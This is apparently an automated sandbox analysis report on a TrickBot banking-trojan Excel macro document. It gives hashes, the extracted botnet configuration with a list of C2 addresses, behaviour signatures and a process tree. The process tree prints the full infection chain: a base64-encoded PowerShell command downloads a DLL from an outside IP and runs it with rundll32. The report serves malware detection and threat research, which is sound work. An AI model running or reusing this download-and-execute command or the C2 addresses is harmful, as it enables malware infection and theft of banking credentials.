trickbot | 056e1bdd3bc59bce465cfcea4bff39876b99086757e5b3f31df9c12e5b7cab31

General

Target

doc1 (33).xlsm
Size

130KB
MD5

dc05be7a3a80a8361cebded08ba1ad6f
SHA1

aa145cd9773b10c5b9967c65d80ec4c92115e745
SHA256

056e1bdd3bc59bce465cfcea4bff39876b99086757e5b3f31df9c12e5b7cab31
SHA512

2efee02da4c63f4c08adb95c3ada96f31144752f1413829d28df353b3d0118cd89bc70c1bc20f47997f324afc162f533522f59b0681eb279591ded59e3bc9d6e

Score

10^/10

trickbot rob136 banker trojan

Malware Config

Extracted

Family

trickbot

Version

100019

Botnet

rob136

C2

65.152.201.203:443

185.56.175.122:443

46.99.175.217:443

179.189.229.254:443

46.99.175.149:443

181.129.167.82:443

216.166.148.187:443

46.99.188.223:443

128.201.76.252:443

62.99.79.77:443

60.51.47.65:443

24.162.214.166:443

45.36.99.184:443

97.83.40.67:443

184.74.99.214:443

103.105.254.17:443

62.99.76.213:443

82.159.149.52:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4052	2352	cmd.exe	EXCEL.EXE

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

39 1960 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1432 rundll32.exe

flow	pid	process
39	1960	powershell.exe

pid	process
1432	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2352 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1960 powershell.exe
1960 powershell.exe
1960 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewermgr.exe

description pid process

Token: SeDebugPrivilege 1960 powershell.exe
Token: SeDebugPrivilege 3512 wermgr.exe

pid	process
1960	powershell.exe
1960	powershell.exe
1960	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	3512	wermgr.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE
2352	EXCEL.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

EXCEL.EXEcmd.exerundll32.exerundll32.exe

description	pid	process	target process
PID 2352 wrote to memory of 4052	2352	EXCEL.EXE	cmd.exe
PID 2352 wrote to memory of 4052	2352	EXCEL.EXE	cmd.exe
PID 4052 wrote to memory of 1960	4052	cmd.exe	powershell.exe
PID 4052 wrote to memory of 1960	4052	cmd.exe	powershell.exe
PID 4052 wrote to memory of 356	4052	cmd.exe	rundll32.exe
PID 4052 wrote to memory of 356	4052	cmd.exe	rundll32.exe
PID 356 wrote to memory of 1432	356	rundll32.exe	rundll32.exe
PID 356 wrote to memory of 1432	356	rundll32.exe	rundll32.exe
PID 356 wrote to memory of 1432	356	rundll32.exe	rundll32.exe
PID 1432 wrote to memory of 1648	1432	rundll32.exe	cmd.exe
PID 1432 wrote to memory of 1648	1432	rundll32.exe	cmd.exe
PID 1432 wrote to memory of 1648	1432	rundll32.exe	cmd.exe
PID 1432 wrote to memory of 3512	1432	rundll32.exe	wermgr.exe
PID 1432 wrote to memory of 3512	1432	rundll32.exe	wermgr.exe
PID 1432 wrote to memory of 3512	1432	rundll32.exe	wermgr.exe
PID 1432 wrote to memory of 3512	1432	rundll32.exe	wermgr.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\doc1 (33).xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /B /WAIT powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADcAMgAvAGkAbQBhAGcAZQBzAC8AYQByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,versus
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADcAMgAvAGkAbQBhAGcAZQBzAC8AYQByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,versus
3⤵
- Suspicious use of WriteProcessMemory
PID:356

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,versus
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
5⤵
PID:1648

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3512

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\clb.dll
MD5
4f142d0fca158d333b98bd20ec2c70c8

SHA1
716cab4911102cd47ebc577d5712ade3f55e1729

SHA256
25e33433712124d16fdd126ee77c34309bd01680e50c1269a4d1ea2d59f3b8a1

SHA512
50a73179c814ebf6bf78142d9de61565f4cdf0886bbb6525cf37b4acae729b7b913a3f085d63bc482f63ee2099a638e3e519a41aba5e63a3078d577e56bc7826

Download Submit
\ProgramData\clb.dll
MD5
4f142d0fca158d333b98bd20ec2c70c8

SHA1
716cab4911102cd47ebc577d5712ade3f55e1729

SHA256
25e33433712124d16fdd126ee77c34309bd01680e50c1269a4d1ea2d59f3b8a1

SHA512
50a73179c814ebf6bf78142d9de61565f4cdf0886bbb6525cf37b4acae729b7b913a3f085d63bc482f63ee2099a638e3e519a41aba5e63a3078d577e56bc7826

Download Submit
memory/356-313-0x0000000000000000-mapping.dmp

Download
memory/1432-330-0x00000000031F1000-0x00000000031F3000-memory.dmp

Filesize
8KB

Download
memory/1432-329-0x0000000003400000-0x000000000354A000-memory.dmp

Filesize
1.3MB

Download
memory/1432-328-0x0000000005030000-0x0000000005075000-memory.dmp

Filesize
276KB

Download
memory/1432-322-0x0000000004EF0000-0x0000000004F29000-memory.dmp

Filesize
228KB

Download
memory/1432-315-0x0000000000000000-mapping.dmp

Download
memory/1960-301-0x000002027B820000-0x000002027B822000-memory.dmp

Filesize
8KB

Download
memory/1960-311-0x000002027B826000-0x000002027B828000-memory.dmp

Filesize
8KB

Download
memory/1960-302-0x000002027B823000-0x000002027B825000-memory.dmp

Filesize
8KB

Download
memory/1960-290-0x0000000000000000-mapping.dmp

Download
memory/2352-121-0x00000241B0810000-0x00000241B0812000-memory.dmp

Filesize
8KB

Download
memory/2352-120-0x00000241B0810000-0x00000241B0812000-memory.dmp

Filesize
8KB

Download
memory/2352-116-0x00007FF937A30000-0x00007FF937A40000-memory.dmp

Filesize
64KB

Download
memory/2352-129-0x00007FF934D50000-0x00007FF934D60000-memory.dmp

Filesize
64KB

Download
memory/2352-128-0x00007FF937A30000-0x00007FF937A40000-memory.dmp

Filesize
64KB

Download
memory/2352-127-0x00007FF934D50000-0x00007FF934D60000-memory.dmp

Filesize
64KB

Download
memory/2352-115-0x00007FF937A30000-0x00007FF937A40000-memory.dmp

Filesize
64KB

Download
memory/2352-300-0x00000241C52A0000-0x00000241C52A4000-memory.dmp

Filesize
16KB

Download
memory/2352-119-0x00000241B0810000-0x00000241B0812000-memory.dmp

Filesize
8KB

Download
memory/2352-118-0x00007FF937A30000-0x00007FF937A40000-memory.dmp

Filesize
64KB

Download
memory/2352-117-0x00007FF937A30000-0x00007FF937A40000-memory.dmp

Filesize
64KB

Download
memory/3512-331-0x0000000000000000-mapping.dmp

Download
memory/3512-332-0x000001859FB10000-0x000001859FB39000-memory.dmp

Filesize
164KB

Download
memory/3512-333-0x000001859FC20000-0x000001859FC21000-memory.dmp

Filesize
4KB

Download
memory/4052-288-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads